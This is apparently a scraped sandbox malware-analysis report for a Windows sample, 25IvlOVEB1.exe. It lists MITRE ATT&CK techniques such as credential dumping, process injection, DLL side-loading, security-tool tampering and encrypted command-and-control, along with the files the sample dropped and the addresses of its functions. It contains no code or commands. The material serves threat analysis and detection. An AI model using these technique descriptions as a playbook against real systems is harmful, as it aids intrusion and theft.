Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 25IvlOVEB1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\E8-03HaL

C:\Users\user\AppData\Local\Temp\aut8CBF.tmp

C:\Users\user\AppData\Local\Temp\aut8D0E.tmp

C:\Users\user\AppData\Local\Temp\silvexes

C:\Users\user\AppData\Local\Temp\underbalanced

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
25IvlOVEB1.exe

Function 00073B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 000749A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00074E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 000D9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0007301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00073041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0007708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00073A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00073633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00073766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 014B25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 000739D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 014B23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre